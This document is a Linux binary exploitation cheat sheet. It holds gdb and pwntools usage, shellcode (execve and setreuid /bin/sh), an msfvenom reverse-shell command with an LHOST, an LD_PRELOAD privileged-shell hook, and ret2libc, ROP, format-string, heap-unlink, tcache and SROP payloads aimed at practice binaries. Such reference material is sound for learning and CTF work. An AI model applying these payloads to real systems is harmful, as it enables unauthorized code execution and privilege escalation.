Last changed: 31.07.2020
linux exploitation
show imports
ldd my_binary
nm -D my_binary
readelf -d my_binary
locate buffer overflow
ltrace -i ./my_binary `python -c 'from pwn import *; g=cyclic_gen(string.ascii_lowercase); print(g.get(100))'`
setup gdb extensions
clone peda and gef
git clone https://github.com/longld/peda.git ~/src/peda
git clone https://github.com/hugsy/gef.git -b master ~/src/gef
.gdbinit
define init-peda
source ~/src/peda/peda.py
end
define init-gef
source ~/src/gef/gef.py
end
/usr/bin/gdb-peda
#!/bin/sh
exec gdb -q -ex init-peda "$@"
/usr/bin/gdb-gef
#!/bin/sh
exec gdb -q -ex init-gef "$@"
pwntools
>>> from pwn import *
>>> p = process(['./binary'])
>>> p = remote('10.0.0.1', 1234)
>>> p.send(p32(0xdeadbeef))
>>> leak = u32(p.recv())
>>> p.interactive()
remote gdb debugging
>>> p = process(['gdbserver', 'localhost:1234', './binary'])
stripped binaries
To find the entry point of stripped PIE binaries you can set an initial breakpoint or read the file info
(gdb) starti
(gdb) info files
(gdb) info functions
Another method is to look at imported functions and use ltrace
objdump -R my_binary
ltrace my_binary 2>&1 | grep main
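The entry point can also be read straight from the ELF header. The following is a minimal sketch using only the Python standard library; the function name elf_entry is made up for illustration. For PIE binaries the value is an offset that still has to be added to the load base.

```python
import struct

def elf_entry(header: bytes) -> int:
    """Return e_entry from the first bytes of an ELF file (hypothetical helper)."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64bit = header[4] == 2                 # EI_CLASS: 1 = 32 bit, 2 = 64 bit
    endian = "<" if header[5] == 1 else ">"   # EI_DATA: 1 = little endian, 2 = big endian
    fmt = endian + ("Q" if is_64bit else "I")
    # e_entry follows e_ident (16 bytes), e_type (2), e_machine (2), e_version (4)
    return struct.unpack_from(fmt, header, 24)[0]

# Usage (my_binary is the placeholder name used above):
# with open("my_binary", "rb") as f:
#     print(hex(elf_entry(f.read(64))))
```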
source files
If you have the corresponding source code and compiled the binary with debug
information, gdb can inspect the source code.
(gdb) list
(gdb) br <filename>:<linenumber>
(gdb) info source
(gdb) info functions <search_regex>
(gdb) info line *<address>
advanced gdb features
environment variables
show env
set env test = ABC
unset env test
modify values
set $eax=1
set {int}$esp=1337
set {char [4]}0xbffffb08="ABC"
signals
info signals
handle SIGSEGV pass nostop
libraries
You can set gdb to break on library load
show stop-on-solib-events
set stop-on-solib-events 1
disable ASLR, PIE, NX, Canaries, RELRO and compiler optimization
To practice or analyze simple exploits it can help to deactivate some mitigations. On Linux this can be done with the following commands.
echo 0 > /proc/sys/kernel/randomize_va_space
gcc -o test test.c -no-pie -zexecstack -fno-stack-protector -znorelro -O0
overload imported functions
#include <stdlib.h>
void usleep() {
unsetenv("LD_PRELOAD");
system("/bin/bash -p");
exit(0);
}
Compile the file as a shared object and load it with LD_PRELOAD.
gcc -fpic -shared -o lib.so lib.c
LD_PRELOAD=/path/to/lib.so my_binary
determine buffer length
metasploit
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb 300
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 0x396a4138
peda
gdb-peda$ pattern_create 300
gdb-peda$ pattern_offset 0x41416d41
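If neither tool is at hand, the idea can be sketched in plain Python. This is an illustrative re-implementation of the Aa0Aa1Aa2... scheme, not the code of either tool, and the function names are chosen here. The pattern PEDA generates is different, so offsets are only valid for patterns created by the same generator.

```python
import struct
from itertools import islice, product
from string import ascii_lowercase, ascii_uppercase, digits

def pattern_create(length: int) -> str:
    """Build 'Aa0Aa1Aa2...' so that every 4 byte window is unique."""
    triples = product(ascii_uppercase, ascii_lowercase, digits)
    needed = (length + 2) // 3
    return "".join("".join(t) for t in islice(triples, needed))[:length]

def pattern_offset(value: int, length: int = 8192) -> int:
    """Find the little endian 32 bit value (e.g. a crashed EIP) in the pattern."""
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(needle)

print(pattern_create(12))               # Aa0Aa1Aa2Aa3
print(pattern_offset(0x396a4138))       # 296
```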
send binary data to program input
To send your exploit to a vulnerable binary you can use a scripting language
like python or perl. To keep the pipe open after your payload you can use cat.
(perl -e 'print("A"x1234, "\xef\xbe\xad\xde", <SHELLCODE>, "\n")'; cat) | ./vuln_app
(python2 -c 'print("A"*1234 + "\xef\xbe\xad\xde" + <SHELLCODE>)'; cat) | ./vuln_app
(python3 -c 'import sys;sys.stdout.buffer.write(b"A"*1234 + b"\xef\xbe\xad\xde" + <SHELLCODE> + b"\n")'; cat) | ./vuln_app
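For longer payloads a small script is easier to maintain than a one-liner. The following sketch assumes a 32 bit little endian target; build_payload and its parameters are illustrative names, and the offset and address are the placeholder values from the one-liners above.

```python
import struct

def build_payload(offset: int, ret_addr: int, shellcode: bytes = b"") -> bytes:
    """Padding up to the return address, the new return address, then shellcode."""
    return b"A" * offset + struct.pack("<I", ret_addr) + shellcode + b"\n"

# Usage: write raw bytes to stdout and pipe them into the target, e.g.
#   (python3 payload.py; cat) | ./vuln_app
# import sys
# sys.stdout.buffer.write(build_payload(1234, 0xdeadbeef))
```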
shellcode generation
Good resources for already assembled shellcode are shell-storm.org and
exploit-db.com. You can search the local exploit-db.
searchsploit "Linux/ARM"
grep "Linux/ARM" /usr/share/exploitdb/files_shellcodes.csv
Information on opcodes and Linux syscalls can be found on sparksandflames.com, github.com/corkami and syscalls.kernelgrok.com.
shell.s
BITS 32
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
int 0x80
Assemble the file and print the opcode string
nasm shell.s -o shell
xxd -p shell
setreuid_shell.s
Some programs (e.g. bash) drop their privileges to the real uid before
executing. In this case you can use shellcode that sets the RUID to the EUID.
BITS 32
push 0x31
pop eax
cdq
int 0x80
mov ebx, eax
mov ecx, eax
push 0x46
pop eax
int 0x80
mov al, 0xb
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
mov ecx, edx
int 0x80
This results in a 34 byte shellcode.
echo 6a315899cd8089c389c16a4658cd80b00b52686e2f7368682f2f626989e389d1cd80 | sed 's/.\{2\}/\\x&/g'
\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80
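The same conversion, together with a length check, can be sketched in Python. The helper name to_escaped is chosen here for illustration; the hex string is the one shown above.

```python
def to_escaped(hexstring: str) -> str:
    """Turn 'deadbeef' into the text '\\xde\\xad\\xbe\\xef'."""
    raw = bytes.fromhex(hexstring)
    return "".join(f"\\x{b:02x}" for b in raw)

SETREUID_SHELL = "6a315899cd8089c389c16a4658cd80b00b52686e2f7368682f2f626989e389d1cd80"

print(len(bytes.fromhex(SETREUID_SHELL)))   # 34
print(to_escaped(SETREUID_SHELL))
```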
radare2
With radare2 you can do this in one step
rasm2 -a x86 -b 32 "xor eax,eax; xor edx,edx; push eax; push 0x68732f2f; push 0x6e69622f; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0xb; int 0x80"
To use the hexstring in a script you can insert escape sequences.
echo 31c031d250682f2f7368682f62696e89e3505389e1b00bcd80 | sed 's/.\{2\}/\\x&/g'
\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
metasploit
Alternatively you can generate shellcode with metasploit
msfvenom -l payloads
msfvenom -p linux/x86/shell_reverse_tcp --list-options
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 -b "\x00\x0a" -f c
To test the generated shellcode you can use the following program
shellcode_test.c
#include <stdlib.h>
char sc[] = "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(void){
void (*f)(void);
f = (void *)sc;
f();
}
Compile the above with
gcc -m32 -z execstack -o shellcode_test shellcode_test.c
cat shellcode
Sometimes an interactive shell is not the best choice for your payload. If you
just want to read a specific file on the target you could generate a shellcode
which executes cat <FILE>. I wrote a small script that generates such shellcode.
modify precompiled shellcode
To disassemble and patch shellcode you can use the Online Assembler and
Disassembler on shell-storm.org or do it with radare2
rasm2 -b 64 -d `echo "\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x80\xb8\x00\x00\x00\x48\x89\xc1\x48\x8b\x80\xe8\x02\x00\x00\x48\x2d\xe8\x02\x00\x00\x4c\x8b\x88\xe0\x02\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x58\x03\x00\x00\x48\x89\x91\x58\x03\x00\x00\xc3" | tr -d '\\\\x'` | tr '\n' ';'
rasm2 -b 64 "mov rax, qword gs:[0x188];mov rax, qword [rax + 0xb8];mov rcx, rax;mov rax, qword [rax + 0x2f0];sub rax, 0x2f0;mov r9, qword [rax + 0x2e8];cmp r9, 4;jne 0x13;mov rdx, qword [rax + 0x360];mov qword [rcx + 0x360], rdx;ret;" | sed 's/.\{2\}/\\x&/g'
trampolines
If randomization is in use you could try to find an instruction like jmp rsp in
a library which is loaded at a fixed address. Then overwrite the return address
with the address of such a trampoline, followed by your shellcode.
find base addresses
cat /proc/<pid>/maps | grep libc
(gdb) info proc mappings
gdb-peda$ vmmap
search instructions
objdump -D /usr/lib/libc.so.6 -M intel | grep -e'jmp *rsp'
ropper -f /usr/lib/libc.so.6 -I 0xBA5E0000 --instructions 'jmp rax'
gdb-peda$ jmpcall esp libc
nasm shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 64
nasm > jmp rsp
00000000 FFE4 jmp rsp
rasm2
rasm2 -a arm -b 16 'bx sp'
6847
rasm2 -a arm -b 16 -d 6847
bx sp
search opcode with ropper
ropper -f arm_libc.so.6 -I 0xBA5E0000 --opcode 6?47
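A raw opcode search can also be sketched in a few lines of Python. The helper find_opcode is a made-up name. Note that it reports file offsets plus the given base, which only matches the runtime address when file and memory layout of the segment agree, and that it does not check whether a hit lies in an executable mapping.

```python
def find_opcode(data: bytes, opcode: bytes, base: int = 0) -> list:
    """Return base + offset for every occurrence of opcode in data."""
    hits = []
    pos = data.find(opcode)
    while pos != -1:
        hits.append(base + pos)
        pos = data.find(opcode, pos + 1)
    return hits

# Usage (path and base address taken from the examples above):
# with open("/usr/lib/libc.so.6", "rb") as f:
#     for addr in find_opcode(f.read(), b"\xff\xe4", 0xBA5E0000):  # FFE4 = jmp rsp
#         print(hex(addr))
```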
return2libc (32bit)
If the base address of the libc is fixed and you find everything you need in
its address space you can write a return2libc exploit.
find function addresses
gdb-peda$ x/wx system
0xb7e67310 <system>: 0x08ec8353
gdb-peda$ x/wx exit
0xb7e5a260 <exit>: 0x5a55e853
search strings with gdb
Then look up the string /bin/sh which is included in the libc.
(gdb) br __libc_start_main
(gdb) run
(gdb) info sharedlibrary
(gdb) find &system,+9999999,"/bin/sh"
search strings with peda
gdb-peda$ searchmem "/bin/sh" libc
search string with gef
gef> search-pattern "/bin/sh"
exploit
Finally, overwrite the return address with <SYSTEM ADDR><EXIT ADDR><BIN/SH ADDR>
./binary `python2 -c 'print("A"*32 + "\x10\x73\xe6\xb7" + "\x60\xa2\xe5\xb7" + "\x4c\x9d\xf8\xb7")'`
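The same chain can be assembled from the numeric addresses, which avoids byte-order mistakes. A minimal sketch, assuming a 32 bit little endian target; ret2libc is an illustrative name and the addresses are the example values from above.

```python
import struct

def ret2libc(offset: int, system: int, exit_: int, binsh: int) -> bytes:
    """padding | system() | return address for system (exit) | argument for system"""
    return b"A" * offset + struct.pack("<III", system, exit_, binsh)

payload = ret2libc(32, 0xb7e67310, 0xb7e5a260, 0xb7f89d4c)
print(payload)
```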
return to dl-resolve
In binaries without full RELRO (Relocation Read-Only) it can be possible to
craft the needed parameters and call _dl_runtime_resolve on any chosen function
in the loaded libraries.
get needed addresses
objdump -x my_binary | grep -e STRTAB -e SYMTAB -e JMPREL
gef> maintenance info sections
gef> got
buffer layout
--------------
<buffer>     | fake EBP      | for leave instruction
             | PLT[0]        | push link_map; jmp _dl_runtime_resolve
             | rel_offset    | <buffer + X> - JMPREL
             | fake RET      | after function call
             | function args |
             | ...           |
<buffer + X> | r_offset      | some GOT address for resolved address
             | r_info        | (<buffer + Y> - SYMTAB) << 4 | 0x7
             | ...           | padding until (<buffer + Y> - SYMTAB) % 0x10 == 0
<buffer + Y> | st_name       | <buffer + Z> - STRTAB
             | st_value      | 0x0 (irrelevant)
             | st_size       | 0x0 (irrelevant)
             | st_info       | 0x0 (st_other & 0x3 == 0)
<buffer + Z> | sym_string    | function name (e.g. "execve\0")
             | ...           |
execution
To get your function resolved you could try to transfer the stack pointer to
your buffer with a leave; ret gadget.
There should be enough writable space above the buffer for the following stack
frames of _dl_runtime_resolve.
A detailed writeup of this method can be found on github.
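The arithmetic of the buffer layout above can be sketched as follows for a 32 bit little endian binary. The function name and all addresses in the usage line are hypothetical; it only builds the fake Elf32_Rel, Elf32_Sym and name string and returns the rel_offset to push, and it ignores symbol versioning, which can interfere in practice.

```python
import struct

def fake_dlresolve(rel_addr, symtab, strtab, jmprel, got_addr, name=b"execve"):
    """Return (rel_offset, blob); blob has to be placed at rel_addr (<buffer + X>)."""
    sym_addr = rel_addr + 8                    # Elf32_Rel is 8 bytes
    pad = -(sym_addr - symtab) % 16            # Elf32_Sym entries are 16 bytes apart
    sym_addr += pad                            # this is <buffer + Y>
    str_addr = sym_addr + 16                   # this is <buffer + Z>
    r_info = (((sym_addr - symtab) // 16) << 8) | 0x7   # 0x7 = R_386_JMP_SLOT
    rel = struct.pack("<II", got_addr, r_info)
    # st_name, st_value, st_size, then st_info/st_other/st_shndx all zero
    sym = struct.pack("<IIII", str_addr - strtab, 0, 0, 0)
    blob = rel + b"\x00" * pad + sym + name + b"\x00"
    return rel_addr - jmprel, blob

# Hypothetical addresses, normally taken from objdump -x as shown above
rel_offset, blob = fake_dlresolve(0x0804a100, symtab=0x080481cc, strtab=0x0804826c,
                                  jmprel=0x080482f8, got_addr=0x0804a00c)
```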
OneGadget
With the tool one_gadget you can search for a single gadget which will execute "/bin/sh".
one_gadget --base <BASE_ADDRESS> libc.so.6
return oriented programming
search gadgets
ropper -f my_library --nocolor > rop_gadgets.txt
ropper can search for gadgets in binaries. ? stands for any character and % for
any string.
ropper -f my_library -I <base> --search 'pop e?x; pop e?x'
ropper -f my_library -I <base> --search 'mov [???], eax'
ropper -f my_library -I <base> --search 'mov [e%], eax'
generate full chain
ropper -f my_library --chain "execve cmd=/bin/sh" --badbytes 000a
find statically mapped libraries
ltrace ./my_binary 2>&1 | grep -e mmap -e open
format string exploits
In most calling conventions some or all parameters are passed on the stack.
On 64-bit Linux the first six arguments are passed in RDI, RSI, RDX, RCX, R8
and R9; additional arguments are passed on the stack. On 64-bit Windows the
first four are passed in RCX, RDX, R8 and R9 and the rest on the stack.
Depending on the format string vulnerability the content of these registers and the stack can be read or used to modify memory.
read data
First you have to find out at which parameter position your string is placed.
AAAA%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x
Then you send the address you want to read and the found parameter position.
\xef\xbe\xad\xde%7$s
write data
To write data you can use the %n placeholder to write 4 bytes, %hn for 2 bytes
and %hhn to write a single byte. The value written to the referenced address is
the number of bytes printed so far. This number can be adjusted with the width
field.
To write the value 0x1337 to the address 0xdeadbeef use
\xef\xbe\xad\xde%4915x%7$n
\xef\xbe\xad\xde%4915x%7$hn
\xef\xbe\xad\xde\xf0\xbe\xad\xde%11x%8$hhn%36x%7$hhn
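The padding values in the byte-wise variant can be computed instead of worked out by hand. A sketch under the same assumptions as the examples above: 32 bit target, the addresses sit at the start of the string, and the first address is reachable as parameter first_arg. The function name is illustrative, and addresses containing zero bytes would cut the string short.

```python
import struct

def fmt_write(addr: int, value: int, nbytes: int, first_arg: int) -> bytes:
    """Write the low nbytes of value to addr, one %hhn per byte."""
    payload = b"".join(struct.pack("<I", addr + i) for i in range(nbytes))
    # (byte value, parameter position), smallest byte first so the counter only grows
    writes = sorted(((value >> (8 * i)) & 0xff, first_arg + i) for i in range(nbytes))
    printed = len(payload)
    for byte, arg in writes:
        pad = (byte - printed) % 256
        if 0 < pad < 8:
            pad += 256      # %Nx may print up to 8 digits, so avoid widths below 8
        if pad:
            payload += f"%{pad}x".encode()
        payload += f"%{arg}$hhn".encode()
        printed += pad
    return payload

print(fmt_write(0xdeadbeef, 0x1337, 2, 7))
```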
finding write locations
If you do not know the location of the return address you could try writing to
the .fini_array, the .dtors or the .got.plt. If none of these work you could
check whether you can overwrite the address of .fini in the .dynamic section.
readelf -S binary | grep -e got -e dtors -e fini -e dynamic
(gdb) maintenance info sections
gef> got
If you can only write a single byte you could try to overwrite the got entry
of a function which is not yet resolved with the plt entry address of another
function (e.g. system).
pwntools
def send_fmt(s):
    # send the format string and return the output up to the next prompt
    p.sendline(s)
    d = p.recvuntil(prompt)
    return d[:-len(prompt)]
fmt = FmtStr(execute_fmt=send_fmt, offset=str_offset)
fmt.write(target, value)
fmt.execute_writes()
libformatstr
The python module libformatstr can also help writing format string exploits.
heap overflows
heap chunks
             used chunk           free chunk
             ----------------     ----------------
             | prev_size    |     | prev_size    |
             | size + flags |     | size + flags |
pointer ->   | data         |     | FD pointer   |
             | ...          |     | BK pointer   |
             ----------------     ----------------
The flags are 3 bits. The LSB is the PREV_INUSE flag.
As prev_size is only needed if the previous chunk is free it can be used for
data by a previous chunk which is in use.
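Splitting a size field into size and flags can be sketched like this. PREV_INUSE is named above; the other two flag names are the ones glibc uses for the remaining bits, and the helper name is made up.

```python
PREV_INUSE = 0x1       # previous chunk is in use
IS_MMAPPED = 0x2       # chunk was obtained with mmap
NON_MAIN_ARENA = 0x4   # chunk belongs to a non-main arena

def parse_size_field(field: int) -> dict:
    """Separate the chunk size from the three flag bits."""
    return {
        "size": field & ~0x7,
        "prev_inuse": bool(field & PREV_INUSE),
        "is_mmapped": bool(field & IS_MMAPPED),
        "non_main_arena": bool(field & NON_MAIN_ARENA),
    }

print(parse_size_field(0x91))
```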
You can analyse the heap with gef
gef> heap bins
gef> heap chunks
memory allocator hooks
The libc offers writable memory to put in hooking functions for debugging the memory allocation process.
(gdb) info address __malloc_hook
(gdb) info address __realloc_hook
(gdb) info address __free_hook
(gdb) info address __memalign_hook
These functions get called if the corresponding memory allocation is done. Therefore they represent perfect targets to gain code execution.
Even if malloc is not directly called by the vulnerable binary you can
sometimes trigger it (e.g. by calling printf(<64k string>)).
dlmalloc (without safe unlinking)
Prerequisites are a chunk with a buffer overflow vulnerability into another chunk which will be freed afterwards by the program.
By overwriting the chunks metadata we can insert fake chunks to enforce coalescence and unlinking.
#define unlink(P, BK, FD) {            \
  FD = P->fd;   /* chunk +8 */         \
  BK = P->bk;   /* chunk +12 */        \
  FD->bk = BK;                         \
  BK->fd = FD;                         \
}
Negative values are used for the sizes to avoid zero bytes. Therefore the "next" chunk is located in memory before the "previous" chunk.
fake_after_next            fake_next                  freed chunk
----------------------     ----------------------     ----------------------
| "AAAA"             |     | "AAAA"             |     | "AAAA"             |
| PREV_INUSE not set |     | "\xf9\xff\xff\xff" |     | "\xf1\xff\xff\xff" |
----------------------     | <target_addr -12>  |     ----------------------
                           | <shellcode_addr>   |
                           ----------------------
To decide whether coalescing is needed, the PREV_INUSE flag of the freed chunk
itself and the one of the chunk after the next are checked. As the latter is
not set, the next chunk is treated as free and has to be unlinked.
The shellcode should begin with a short jump over some unused bytes as the
target_addr will be written into this space by unlink().
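The effect of the two writes in unlink() can be followed with a toy memory model. This is only a simulation with a Python dict standing in for 32 bit memory; the fake chunk address is hypothetical, the other two values are example addresses.

```python
def unlink(mem: dict, p: int) -> None:
    """Same steps as the macro above, on a dict that maps address -> 32 bit value."""
    fd = mem[p + 8]
    bk = mem[p + 12]
    mem[fd + 12] = bk    # FD->bk = BK : writes shellcode_addr to target_addr
    mem[bk + 8] = fd     # BK->fd = FD : clobbers 4 bytes at shellcode_addr + 8

target_addr = 0x080496cc
shellcode_addr = 0x0804a008
fake_next = 0x0804a0a0   # hypothetical location of the fake chunk

mem = {fake_next + 8: target_addr - 12, fake_next + 12: shellcode_addr}
unlink(mem, fake_next)
print(hex(mem[target_addr]))          # 0x804a008
print(hex(mem[shellcode_addr + 8]))   # 0x80496c0
```

The second write is why the shellcode has to jump over the bytes at offset 8 to 11.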
In this example the distance between the two chunks is 0xa0 and the value
at 0x080496cc gets overwritten with the shellcode address 0x0804a008.
python2 -c 'sc="\xeb\x0e"+"A"*14+"\xcc"; print(sc+"A"*(0xa0-8-len(sc)-5*4)+"\x02"+"A"*7+"\xf9\xff\xff\xff"+"\xb8\x96\x04\x08"+"\x08\xa0\x04\x08"+"A"*4+"\xf1\xff\xff\xff")'
leaking heap bin addresses
If a chunk from a heap bin is not overwritten it can be possible to obtain the values of its FD or BK pointers. This can be interesting if they point to the list head e.g. in the main arena of libc.
tcache poisoning
The Tcache is another fast heap bin which can hold up to 7 singly linked free
chunks for each size.
By overwriting the FD pointer of a chunk in the Tcache you could trick malloc
into returning an arbitrary memory location: the allocation that follows the
one returning the corrupted chunk yields the address stored in its FD pointer.
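The mechanism can be illustrated with a toy model of a single bin. This is not the allocator's code: the class and the addresses are invented for the sketch, and it ignores the entry limit as well as any integrity checks or pointer protection a real libc may apply.

```python
class ToyTcacheBin:
    """Singly linked LIFO list of free chunks of one size."""

    def __init__(self):
        self.head = 0
        self.fd = {}              # chunk address -> stored FD pointer

    def free(self, chunk: int) -> None:
        self.fd[chunk] = self.head
        self.head = chunk

    def malloc(self) -> int:
        chunk = self.head
        self.head = self.fd.get(chunk, 0)   # next head is whatever FD says
        return chunk

chunk_a, chunk_b, target = 0x1000, 0x1020, 0xdeadbee0   # hypothetical addresses
tbin = ToyTcacheBin()
tbin.free(chunk_a)
tbin.free(chunk_b)
tbin.fd[chunk_b] = target      # the overflow overwrites the FD pointer of chunk_b
first = tbin.malloc()          # returns the corrupted chunk_b
second = tbin.malloc()         # returns the attacker-chosen address
```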
Sigreturn Oriented Programming
An interesting alternative method for execution flow control is Sigreturn Oriented Programming (SROP).
By calling the sigreturn syscall (0xf) the kernel will try to read a signal
frame from the current stack position and will update the cpu context
accordingly.
from pwn import *
context.clear(arch="amd64")
frame = SigreturnFrame(kernel="amd64")
frame.rax = 59 # execve
frame.rdi = ptr_command
frame.rsi = 0
frame.rdx = 0
Multiple frames can be chained with a syscall; ret gadget.
debugging other architectures
run in qemu
qemu-mips -noaslr -g 1234 ./mips_binary
connect with gdb-multiarch
gdb-multiarch
set endian big
set architecture mips
target remote localhost:1234